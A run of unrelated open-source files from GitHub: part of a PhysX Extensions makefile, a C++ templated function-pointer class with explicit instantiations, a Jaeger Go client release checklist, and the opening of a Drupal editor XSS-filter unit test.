-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_profile_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/profile/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_profile_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_profile_DEPDIR).d
PhysXExtensions_release_hpaths :=
PhysXExtensions_release_hpaths += ./../../Common/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/foundation/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/fastxml/include
PhysXExtensions_release_hpaths += ./../../../../PxShared/src/pvd/include
PhysXExtensions_release_hpaths += ./../../../Include/common
PhysXExtensions_release_hpaths += ./../../../Include/geometry
PhysXExtensions_release_hpaths += ./../../../Include/GeomUtils
PhysXExtensions_release_hpaths += ./../../../Include/pvd
PhysXExtensions_release_hpaths += ./../../../Include/cooking
PhysXExtensions_release_hpaths += ./../../../Include/extensions
PhysXExtensions_release_hpaths += ./../../../Include/vehicle
PhysXExtensions_release_hpaths += ./../../../Include/cloth
PhysXExtensions_release_hpaths += ./../../../Include
PhysXExtensions_release_hpaths += ./../../Common/src
PhysXExtensions_release_hpaths += ./../../GeomUtils/headers
PhysXExtensions_release_hpaths += ./../../GeomUtils/src
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/contact
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/common
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/convex
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/distance
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/gjk
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/intersection
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/mesh
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/hf
PhysXExtensions_release_hpaths += ./../../GeomUtils/src/pcm
PhysXExtensions_release_hpaths += ./../../PhysXMetaData/core/include
PhysXExtensions_release_hpaths += ./../../PhysXMetaData/extensions/include
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/Xml
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/Binary
PhysXExtensions_release_hpaths += ./../../PhysXExtensions/src/serialization/File
PhysXExtensions_release_hpaths += ./../../PvdSDK/src
PhysXExtensions_release_hpaths += ./../../PhysX/src
PhysXExtensions_release_lpaths :=
PhysXExtensions_release_lpaths += ./../../../../PxShared/lib/linux32
PhysXExtensions_release_defines := $(PhysXExtensions_custom_defines)
PhysXExtensions_release_defines += PX_BUILD_NUMBER=0
PhysXExtensions_release_defines += PX_PHYSX_STATIC_LIB
PhysXExtensions_release_defines += NDEBUG
PhysXExtensions_release_defines += PX_SUPPORT_PVD=0
PhysXExtensions_release_libraries :=
PhysXExtensions_release_libraries += PsFastXml
PhysXExtensions_release_common_cflags := $(PhysXExtensions_custom_cflags)
PhysXExtensions_release_common_cflags += -MMD
PhysXExtensions_release_common_cflags += $(addprefix -D, $(PhysXExtensions_release_defines))
PhysXExtensions_release_common_cflags += $(addprefix -I, $(PhysXExtensions_release_hpaths))
PhysXExtensions_release_common_cflags += -m32
PhysXExtensions_release_common_cflags += -Werror -m32 -fPIC -msse2 -mfpmath=sse -malign-double -fno-exceptions -fno-rtti -fvisibility=hidden -fvisibility-inlines-hidden
PhysXExtensions_release_common_cflags += -Wall -Wextra -Wstrict-aliasing=2 -fdiagnostics-show-option
PhysXExtensions_release_common_cflags += -Wno-invalid-offsetof -Wno-uninitialized -Wno-implicit-fallthrough
PhysXExtensions_release_common_cflags += -Wno-missing-field-initializers
PhysXExtensions_release_common_cflags += -O3 -fno-strict-aliasing
PhysXExtensions_release_cflags := $(PhysXExtensions_release_common_cflags)
PhysXExtensions_release_cppflags := $(PhysXExtensions_release_common_cflags)
PhysXExtensions_release_lflags := $(PhysXExtensions_custom_lflags)
PhysXExtensions_release_lflags += $(addprefix -L, $(PhysXExtensions_release_lpaths))
PhysXExtensions_release_lflags += -Wl,--start-group $(addprefix -l, $(PhysXExtensions_release_libraries)) -Wl,--end-group
PhysXExtensions_release_lflags += -lrt
PhysXExtensions_release_lflags += -m32
PhysXExtensions_release_objsdir = $(OBJS_DIR)/PhysXExtensions_release
PhysXExtensions_release_cpp_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cpp, %.cpp.o, $(PhysXExtensions_cppfiles)))))
PhysXExtensions_release_cc_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.cc, %.cc.o, $(PhysXExtensions_ccfiles)))))
PhysXExtensions_release_c_o = $(addprefix $(PhysXExtensions_release_objsdir)/, $(subst ./, , $(subst ../, , $(patsubst %.c, %.c.o, $(PhysXExtensions_cfiles)))))
PhysXExtensions_release_obj = $(PhysXExtensions_release_cpp_o) $(PhysXExtensions_release_cc_o) $(PhysXExtensions_release_c_o)
PhysXExtensions_release_bin := ./../../../Lib/linux32/libPhysX3Extensions.a
clean_PhysXExtensions_release:
@$(ECHO) clean PhysXExtensions release
@$(RMDIR) $(PhysXExtensions_release_objsdir)
@$(RMDIR) $(PhysXExtensions_release_bin)
@$(RMDIR) $(DEPSDIR)/PhysXExtensions/release
build_PhysXExtensions_release: postbuild_PhysXExtensions_release
postbuild_PhysXExtensions_release: mainbuild_PhysXExtensions_release
mainbuild_PhysXExtensions_release: prebuild_PhysXExtensions_release $(PhysXExtensions_release_bin)
prebuild_PhysXExtensions_release:
$(PhysXExtensions_release_bin): $(PhysXExtensions_release_obj) build_PsFastXml_release
mkdir -p `dirname ./../../../Lib/linux32/libPhysX3Extensions.a`
@$(AR) rcs $(PhysXExtensions_release_bin) $(PhysXExtensions_release_obj)
$(ECHO) building $@ complete!
PhysXExtensions_release_DEPDIR = $(dir $(@))/$(*F)
$(PhysXExtensions_release_cpp_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_release_cppflags) -c $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cpp.o,.cpp, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cppfiles))))).P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
$(PhysXExtensions_release_cc_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))...
mkdir -p $(dir $(@))
$(CXX) $(PhysXExtensions_release_cppflags) -c $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles)) -o $@
mkdir -p $(dir $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).release.P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .cc.o,.cc, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_ccfiles))))).release.P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
$(PhysXExtensions_release_c_o): $(PhysXExtensions_release_objsdir)/%.o:
$(ECHO) PhysXExtensions: compiling release $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))...
mkdir -p $(dir $(@))
$(CC) $(PhysXExtensions_release_cflags) -c $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles)) -o $@
@mkdir -p $(dir $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))))
cp $(PhysXExtensions_release_DEPDIR).d $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
sed -e 's/#.*//' -e 's/^[^:]*: *//' -e 's/ *\\$$//' \
-e '/^$$/ d' -e 's/$$/ :/' < $(PhysXExtensions_release_DEPDIR).d >> $(addprefix $(DEPSDIR)/PhysXExtensions/release/, $(subst ./, , $(subst ../, , $(filter %$(strip $(subst .c.o,.c, $(subst $(PhysXExtensions_release_objsdir),, $@))), $(PhysXExtensions_cfiles))))).P; \
rm -f $(PhysXExtensions_release_DEPDIR).d
clean_PhysXExtensions: clean_PhysXExtensions_debug clean_PhysXExtensions_checked clean_PhysXExtensions_profile clean_PhysXExtensions_release
rm -rf $(DEPSDIR)
export VERBOSE
ifndef VERBOSE
.SILENT:
endif
| {
"pile_set_name": "Github"
} |
/**
* @file FP.cpp
* @brief Core Utility - Templated Function Pointer Class
* @author sam grove
* @version 1.0
* @see
*
* Copyright (c) 2013
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "FP.h"
#include <stdint.h>
template<class retT, class argT>
FP<retT, argT>::FP()
{
obj_callback = 0;
c_callback = 0;
}
template<class retT, class argT>
bool FP<retT, argT>::attached()
{
return obj_callback || c_callback;
}
template<class retT, class argT>
void FP<retT, argT>::detach()
{
obj_callback = 0;
c_callback = 0;
}
template<class retT, class argT>
void FP<retT, argT>::attach(retT (*function)(argT))
{
c_callback = function;
}
template<class retT, class argT>
retT FP<retT, argT>::operator()(argT arg) const
{
if( 0 != c_callback )
{
return obj_callback ? (obj_callback->*method_callback)(arg) : (*c_callback)(arg);
}
return (retT)0;
}
// pre-define the types for the linker
template class FP<void,char>;
template class FP<void,char*>;
template class FP<void,int8_t>;
template class FP<void,int8_t*>;
template class FP<void,uint8_t>;
template class FP<void,uint8_t*>;
template class FP<void,int16_t>;
template class FP<void,int16_t*>;
template class FP<void,uint16_t>;
template class FP<void,uint16_t*>;
template class FP<void,int32_t>;
template class FP<void,int32_t*>;
template class FP<void,uint32_t>;
template class FP<void,uint32_t*>;
template class FP<void,int64_t>;
template class FP<void,int64_t*>;
template class FP<void,uint64_t>;
template class FP<void,uint64_t*>;
template class FP<void,bool>;
template class FP<void,bool*>;
template class FP<void,float>;
template class FP<void,float*>;
template class FP<void,double>;
template class FP<void,double*>;
template class FP<void,void*>;
template class FP<int8_t,char>;
template class FP<int8_t,char*>;
template class FP<int8_t,int8_t>;
template class FP<int8_t,int8_t*>;
template class FP<int8_t,uint8_t>;
template class FP<int8_t,uint8_t*>;
template class FP<int8_t,int16_t>;
template class FP<int8_t,int16_t*>;
template class FP<int8_t,uint16_t>;
template class FP<int8_t,uint16_t*>;
template class FP<int8_t,int32_t>;
template class FP<int8_t,int32_t*>;
template class FP<int8_t,uint32_t>;
template class FP<int8_t,uint32_t*>;
template class FP<int8_t,int64_t>;
template class FP<int8_t,int64_t*>;
template class FP<int8_t,uint64_t>;
template class FP<int8_t,uint64_t*>;
template class FP<int8_t,bool>;
template class FP<int8_t,bool*>;
template class FP<int8_t,float>;
template class FP<int8_t,float*>;
template class FP<int8_t,double>;
template class FP<int8_t,double*>;
template class FP<int8_t*,char>;
template class FP<int8_t*,char*>;
template class FP<int8_t*,int8_t>;
template class FP<int8_t*,int8_t*>;
template class FP<int8_t*,uint8_t>;
template class FP<int8_t*,uint8_t*>;
template class FP<int8_t*,int16_t>;
template class FP<int8_t*,int16_t*>;
template class FP<int8_t*,uint16_t>;
template class FP<int8_t*,uint16_t*>;
template class FP<int8_t*,int32_t>;
template class FP<int8_t*,int32_t*>;
template class FP<int8_t*,uint32_t>;
template class FP<int8_t*,uint32_t*>;
template class FP<int8_t*,int64_t>;
template class FP<int8_t*,int64_t*>;
template class FP<int8_t*,uint64_t>;
template class FP<int8_t*,uint64_t*>;
template class FP<int8_t*,bool>;
template class FP<int8_t*,bool*>;
template class FP<int8_t*,float>;
template class FP<int8_t*,float*>;
template class FP<int8_t*,double>;
template class FP<int8_t*,double*>;
template class FP<uint8_t,char>;
template class FP<uint8_t,char*>;
template class FP<uint8_t,int8_t>;
template class FP<uint8_t,int8_t*>;
template class FP<uint8_t,uint8_t>;
template class FP<uint8_t,uint8_t*>;
template class FP<uint8_t,int16_t>;
template class FP<uint8_t,int16_t*>;
template class FP<uint8_t,uint16_t>;
template class FP<uint8_t,uint16_t*>;
template class FP<uint8_t,int32_t>;
template class FP<uint8_t,int32_t*>;
template class FP<uint8_t,uint32_t>;
template class FP<uint8_t,uint32_t*>;
template class FP<uint8_t,int64_t>;
template class FP<uint8_t,int64_t*>;
template class FP<uint8_t,uint64_t>;
template class FP<uint8_t,uint64_t*>;
template class FP<uint8_t,bool>;
template class FP<uint8_t,bool*>;
template class FP<uint8_t,float>;
template class FP<uint8_t,float*>;
template class FP<uint8_t,double>;
template class FP<uint8_t,double*>;
template class FP<uint8_t*,char>;
template class FP<uint8_t*,char*>;
template class FP<uint8_t*,int8_t>;
template class FP<uint8_t*,int8_t*>;
template class FP<uint8_t*,uint8_t>;
template class FP<uint8_t*,uint8_t*>;
template class FP<uint8_t*,int16_t>;
template class FP<uint8_t*,int16_t*>;
template class FP<uint8_t*,uint16_t>;
template class FP<uint8_t*,uint16_t*>;
template class FP<uint8_t*,int32_t>;
template class FP<uint8_t*,int32_t*>;
template class FP<uint8_t*,uint32_t>;
template class FP<uint8_t*,uint32_t*>;
template class FP<uint8_t*,int64_t>;
template class FP<uint8_t*,int64_t*>;
template class FP<uint8_t*,uint64_t>;
template class FP<uint8_t*,uint64_t*>;
template class FP<uint8_t*,bool>;
template class FP<uint8_t*,bool*>;
template class FP<uint8_t*,float>;
template class FP<uint8_t*,float*>;
template class FP<uint8_t*,double>;
template class FP<uint8_t*,double*>;
template class FP<int16_t,char>;
template class FP<int16_t,char*>;
template class FP<int16_t,int8_t>;
template class FP<int16_t,int8_t*>;
template class FP<int16_t,uint8_t>;
template class FP<int16_t,uint8_t*>;
template class FP<int16_t,int16_t>;
template class FP<int16_t,int16_t*>;
template class FP<int16_t,uint16_t>;
template class FP<int16_t,uint16_t*>;
template class FP<int16_t,int32_t>;
template class FP<int16_t,int32_t*>;
template class FP<int16_t,uint32_t>;
template class FP<int16_t,uint32_t*>;
template class FP<int16_t,int64_t>;
template class FP<int16_t,int64_t*>;
template class FP<int16_t,uint64_t>;
template class FP<int16_t,uint64_t*>;
template class FP<int16_t,bool>;
template class FP<int16_t,bool*>;
template class FP<int16_t,float>;
template class FP<int16_t,float*>;
template class FP<int16_t,double>;
template class FP<int16_t,double*>;
template class FP<int16_t*,char>;
template class FP<int16_t*,char*>;
template class FP<int16_t*,int8_t>;
template class FP<int16_t*,int8_t*>;
template class FP<int16_t*,uint8_t>;
template class FP<int16_t*,uint8_t*>;
template class FP<int16_t*,int16_t>;
template class FP<int16_t*,int16_t*>;
template class FP<int16_t*,uint16_t>;
template class FP<int16_t*,uint16_t*>;
template class FP<int16_t*,int32_t>;
template class FP<int16_t*,int32_t*>;
template class FP<int16_t*,uint32_t>;
template class FP<int16_t*,uint32_t*>;
template class FP<int16_t*,int64_t>;
template class FP<int16_t*,int64_t*>;
template class FP<int16_t*,uint64_t>;
template class FP<int16_t*,uint64_t*>;
template class FP<int16_t*,bool>;
template class FP<int16_t*,bool*>;
template class FP<int16_t*,float>;
template class FP<int16_t*,float*>;
template class FP<int16_t*,double>;
template class FP<int16_t*,double*>;
template class FP<uint16_t,char>;
template class FP<uint16_t,char*>;
template class FP<uint16_t,int8_t>;
template class FP<uint16_t,int8_t*>;
template class FP<uint16_t,uint8_t>;
template class FP<uint16_t,uint8_t*>;
template class FP<uint16_t,int16_t>;
template class FP<uint16_t,int16_t*>;
template class FP<uint16_t,uint16_t>;
template class FP<uint16_t,uint16_t*>;
template class FP<uint16_t,int32_t>;
template class FP<uint16_t,int32_t*>;
template class FP<uint16_t,uint32_t>;
template class FP<uint16_t,uint32_t*>;
template class FP<uint16_t,int64_t>;
template class FP<uint16_t,int64_t*>;
template class FP<uint16_t,uint64_t>;
template class FP<uint16_t,uint64_t*>;
template class FP<uint16_t,bool>;
template class FP<uint16_t,bool*>;
template class FP<uint16_t,float>;
template class FP<uint16_t,float*>;
template class FP<uint16_t,double>;
template class FP<uint16_t,double*>;
template class FP<uint16_t*,char>;
template class FP<uint16_t*,char*>;
template class FP<uint16_t*,int8_t>;
template class FP<uint16_t*,int8_t*>;
template class FP<uint16_t*,uint8_t>;
template class FP<uint16_t*,uint8_t*>;
template class FP<uint16_t*,int16_t>;
template class FP<uint16_t*,int16_t*>;
template class FP<uint16_t*,uint16_t>;
template class FP<uint16_t*,uint16_t*>;
template class FP<uint16_t*,int32_t>;
template class FP<uint16_t*,int32_t*>;
template class FP<uint16_t*,uint32_t>;
template class FP<uint16_t*,uint32_t*>;
template class FP<uint16_t*,int64_t>;
template class FP<uint16_t*,int64_t*>;
template class FP<uint16_t*,uint64_t>;
template class FP<uint16_t*,uint64_t*>;
template class FP<uint16_t*,bool>;
template class FP<uint16_t*,bool*>;
template class FP<uint16_t*,float>;
template class FP<uint16_t*,float*>;
template class FP<uint16_t*,double>;
template class FP<uint16_t*,double*>;
template class FP<int32_t,char>;
template class FP<int32_t,char*>;
template class FP<int32_t,int8_t>;
template class FP<int32_t,int8_t*>;
template class FP<int32_t,uint8_t>;
template class FP<int32_t,uint8_t*>;
template class FP<int32_t,int16_t>;
template class FP<int32_t,int16_t*>;
template class FP<int32_t,uint16_t>;
template class FP<int32_t,uint16_t*>;
template class FP<int32_t,int32_t>;
template class FP<int32_t,int32_t*>;
template class FP<int32_t,uint32_t>;
template class FP<int32_t,uint32_t*>;
template class FP<int32_t,int64_t>;
template class FP<int32_t,int64_t*>;
template class FP<int32_t,uint64_t>;
template class FP<int32_t,uint64_t*>;
template class FP<int32_t,bool>;
template class FP<int32_t,bool*>;
template class FP<int32_t,float>;
template class FP<int32_t,float*>;
template class FP<int32_t,double>;
template class FP<int32_t,double*>;
template class FP<int32_t*,char>;
template class FP<int32_t*,char*>;
template class FP<int32_t*,int8_t>;
template class FP<int32_t*,int8_t*>;
template class FP<int32_t*,uint8_t>;
template class FP<int32_t*,uint8_t*>;
template class FP<int32_t*,int16_t>;
template class FP<int32_t*,int16_t*>;
template class FP<int32_t*,uint16_t>;
template class FP<int32_t*,uint16_t*>;
template class FP<int32_t*,int32_t>;
template class FP<int32_t*,int32_t*>;
template class FP<int32_t*,uint32_t>;
template class FP<int32_t*,uint32_t*>;
template class FP<int32_t*,int64_t>;
template class FP<int32_t*,int64_t*>;
template class FP<int32_t*,uint64_t>;
template class FP<int32_t*,uint64_t*>;
template class FP<int32_t*,bool>;
template class FP<int32_t*,bool*>;
template class FP<int32_t*,float>;
template class FP<int32_t*,float*>;
template class FP<int32_t*,double>;
template class FP<int32_t*,double*>;
template class FP<uint32_t,char>;
template class FP<uint32_t,char*>;
template class FP<uint32_t,int8_t>;
template class FP<uint32_t,int8_t*>;
template class FP<uint32_t,uint8_t>;
template class FP<uint32_t,uint8_t*>;
template class FP<uint32_t,int16_t>;
template class FP<uint32_t,int16_t*>;
template class FP<uint32_t,uint16_t>;
template class FP<uint32_t,uint16_t*>;
template class FP<uint32_t,int32_t>;
template class FP<uint32_t,int32_t*>;
template class FP<uint32_t,uint32_t>;
template class FP<uint32_t,uint32_t*>;
template class FP<uint32_t,int64_t>;
template class FP<uint32_t,int64_t*>;
template class FP<uint32_t,uint64_t>;
template class FP<uint32_t,uint64_t*>;
template class FP<uint32_t,bool>;
template class FP<uint32_t,bool*>;
template class FP<uint32_t,float>;
template class FP<uint32_t,float*>;
template class FP<uint32_t,double>;
template class FP<uint32_t,double*>;
template class FP<uint32_t*,char>;
template class FP<uint32_t*,char*>;
template class FP<uint32_t*,int8_t>;
template class FP<uint32_t*,int8_t*>;
template class FP<uint32_t*,uint8_t>;
template class FP<uint32_t*,uint8_t*>;
template class FP<uint32_t*,int16_t>;
template class FP<uint32_t*,int16_t*>;
template class FP<uint32_t*,uint16_t>;
template class FP<uint32_t*,uint16_t*>;
template class FP<uint32_t*,int32_t>;
template class FP<uint32_t*,int32_t*>;
template class FP<uint32_t*,uint32_t>;
template class FP<uint32_t*,uint32_t*>;
template class FP<uint32_t*,int64_t>;
template class FP<uint32_t*,int64_t*>;
template class FP<uint32_t*,uint64_t>;
template class FP<uint32_t*,uint64_t*>;
template class FP<uint32_t*,bool>;
template class FP<uint32_t*,bool*>;
template class FP<uint32_t*,float>;
template class FP<uint32_t*,float*>;
template class FP<uint32_t*,double>;
template class FP<uint32_t*,double*>;
template class FP<int64_t,char>;
template class FP<int64_t,char*>;
template class FP<int64_t,int8_t>;
template class FP<int64_t,int8_t*>;
template class FP<int64_t,uint8_t>;
template class FP<int64_t,uint8_t*>;
template class FP<int64_t,int16_t>;
template class FP<int64_t,int16_t*>;
template class FP<int64_t,uint16_t>;
template class FP<int64_t,uint16_t*>;
template class FP<int64_t,int32_t>;
template class FP<int64_t,int32_t*>;
template class FP<int64_t,uint32_t>;
template class FP<int64_t,uint32_t*>;
template class FP<int64_t,int64_t>;
template class FP<int64_t,int64_t*>;
template class FP<int64_t,uint64_t>;
template class FP<int64_t,uint64_t*>;
template class FP<int64_t,bool>;
template class FP<int64_t,bool*>;
template class FP<int64_t,float>;
template class FP<int64_t,float*>;
template class FP<int64_t,double>;
template class FP<int64_t,double*>;
template class FP<int64_t*,char>;
template class FP<int64_t*,char*>;
template class FP<int64_t*,int8_t>;
template class FP<int64_t*,int8_t*>;
template class FP<int64_t*,uint8_t>;
template class FP<int64_t*,uint8_t*>;
template class FP<int64_t*,int16_t>;
template class FP<int64_t*,int16_t*>;
template class FP<int64_t*,uint16_t>;
template class FP<int64_t*,uint16_t*>;
template class FP<int64_t*,int32_t>;
template class FP<int64_t*,int32_t*>;
template class FP<int64_t*,uint32_t>;
template class FP<int64_t*,uint32_t*>;
template class FP<int64_t*,int64_t>;
template class FP<int64_t*,int64_t*>;
template class FP<int64_t*,uint64_t>;
template class FP<int64_t*,uint64_t*>;
template class FP<int64_t*,bool>;
template class FP<int64_t*,bool*>;
template class FP<int64_t*,float>;
template class FP<int64_t*,float*>;
template class FP<int64_t*,double>;
template class FP<int64_t*,double*>;
template class FP<uint64_t,char>;
template class FP<uint64_t,char*>;
template class FP<uint64_t,int8_t>;
template class FP<uint64_t,int8_t*>;
template class FP<uint64_t,uint8_t>;
template class FP<uint64_t,uint8_t*>;
template class FP<uint64_t,int16_t>;
template class FP<uint64_t,int16_t*>;
template class FP<uint64_t,uint16_t>;
template class FP<uint64_t,uint16_t*>;
template class FP<uint64_t,int32_t>;
template class FP<uint64_t,int32_t*>;
template class FP<uint64_t,uint32_t>;
template class FP<uint64_t,uint32_t*>;
template class FP<uint64_t,int64_t>;
template class FP<uint64_t,int64_t*>;
template class FP<uint64_t,uint64_t>;
template class FP<uint64_t,uint64_t*>;
template class FP<uint64_t,bool>;
template class FP<uint64_t,bool*>;
template class FP<uint64_t,float>;
template class FP<uint64_t,float*>;
template class FP<uint64_t,double>;
template class FP<uint64_t,double*>;
template class FP<uint64_t*,char>;
template class FP<uint64_t*,char*>;
template class FP<uint64_t*,int8_t>;
template class FP<uint64_t*,int8_t*>;
template class FP<uint64_t*,uint8_t>;
template class FP<uint64_t*,uint8_t*>;
template class FP<uint64_t*,int16_t>;
template class FP<uint64_t*,int16_t*>;
template class FP<uint64_t*,uint16_t>;
template class FP<uint64_t*,uint16_t*>;
template class FP<uint64_t*,int32_t>;
template class FP<uint64_t*,int32_t*>;
template class FP<uint64_t*,uint32_t>;
template class FP<uint64_t*,uint32_t*>;
template class FP<uint64_t*,int64_t>;
template class FP<uint64_t*,int64_t*>;
template class FP<uint64_t*,uint64_t>;
template class FP<uint64_t*,uint64_t*>;
template class FP<uint64_t*,bool>;
template class FP<uint64_t*,bool*>;
template class FP<uint64_t*,float>;
template class FP<uint64_t*,float*>;
template class FP<uint64_t*,double>;
template class FP<uint64_t*,double*>;
template class FP<float,char>;
template class FP<float,char*>;
template class FP<float,int8_t>;
template class FP<float,int8_t*>;
template class FP<float,uint8_t>;
template class FP<float,uint8_t*>;
template class FP<float,int16_t>;
template class FP<float,int16_t*>;
template class FP<float,uint16_t>;
template class FP<float,uint16_t*>;
template class FP<float,int32_t>;
template class FP<float,int32_t*>;
template class FP<float,uint32_t>;
template class FP<float,uint32_t*>;
template class FP<float,int64_t>;
template class FP<float,int64_t*>;
template class FP<float,uint64_t>;
template class FP<float,uint64_t*>;
template class FP<float,bool>;
template class FP<float,bool*>;
template class FP<float,float>;
template class FP<float,float*>;
template class FP<float,double>;
template class FP<float,double*>;
template class FP<float*,char>;
template class FP<float*,char*>;
template class FP<float*,int8_t>;
template class FP<float*,int8_t*>;
template class FP<float*,uint8_t>;
template class FP<float*,uint8_t*>;
template class FP<float*,int16_t>;
template class FP<float*,int16_t*>;
template class FP<float*,uint16_t>;
template class FP<float*,uint16_t*>;
template class FP<float*,int32_t>;
template class FP<float*,int32_t*>;
template class FP<float*,uint32_t>;
template class FP<float*,uint32_t*>;
template class FP<float*,int64_t>;
template class FP<float*,int64_t*>;
template class FP<float*,uint64_t>;
template class FP<float*,uint64_t*>;
template class FP<float*,bool>;
template class FP<float*,bool*>;
template class FP<float*,float>;
template class FP<float*,float*>;
template class FP<float*,double>;
template class FP<float*,double*>;
template class FP<double,char>;
template class FP<double,char*>;
template class FP<double,int8_t>;
template class FP<double,int8_t*>;
template class FP<double,uint8_t>;
template class FP<double,uint8_t*>;
template class FP<double,int16_t>;
template class FP<double,int16_t*>;
template class FP<double,uint16_t>;
template class FP<double,uint16_t*>;
template class FP<double,int32_t>;
template class FP<double,int32_t*>;
template class FP<double,uint32_t>;
template class FP<double,uint32_t*>;
template class FP<double,int64_t>;
template class FP<double,int64_t*>;
template class FP<double,uint64_t>;
template class FP<double,uint64_t*>;
template class FP<double,bool>;
template class FP<double,bool*>;
template class FP<double,float>;
template class FP<double,float*>;
template class FP<double,double>;
template class FP<double,double*>;
template class FP<double*,char>;
template class FP<double*,char*>;
template class FP<double*,int8_t>;
template class FP<double*,int8_t*>;
template class FP<double*,uint8_t>;
template class FP<double*,uint8_t*>;
template class FP<double*,int16_t>;
template class FP<double*,int16_t*>;
template class FP<double*,uint16_t>;
template class FP<double*,uint16_t*>;
template class FP<double*,int32_t>;
template class FP<double*,int32_t*>;
template class FP<double*,uint32_t>;
template class FP<double*,uint32_t*>;
template class FP<double*,int64_t>;
template class FP<double*,int64_t*>;
template class FP<double*,uint64_t>;
template class FP<double*,uint64_t*>;
template class FP<double*,bool>;
template class FP<double*,bool*>;
template class FP<double*,float>;
template class FP<double*,float*>;
template class FP<double*,double>;
template class FP<double*,double*>;
template class FP<char, char>;
template class FP<char, char*>;
template class FP<char, const char*>;
template class FP<char*, char>;
template class FP<char*, char*>;
template class FP<char*, const char*>;
| {
"pile_set_name": "Github"
} |
# Release Process
1. Create a PR "Preparing for release X.Y.Z" against master branch
* Alter CHANGELOG.md from `<placeholder_version> (unreleased)` to `<X.Y.Z> (YYYY-MM-DD)`
* Update `JaegerClientVersion` in constants.go to `Go-X.Y.Z`
2. Create a release "Release X.Y.Z" on Github
* Create Tag `vX.Y.Z`
* Copy CHANGELOG.md into the release notes
3. Create a PR "Back to development" against master branch
* Add `<next_version> (unreleased)` to CHANGELOG.md
* Update `JaegerClientVersion` in constants.go to `Go-<next_version>dev`
| {
"pile_set_name": "Github"
} |
<?php
namespace Drupal\Tests\editor\Unit\EditorXssFilter;
use Drupal\editor\EditorXssFilter\Standard;
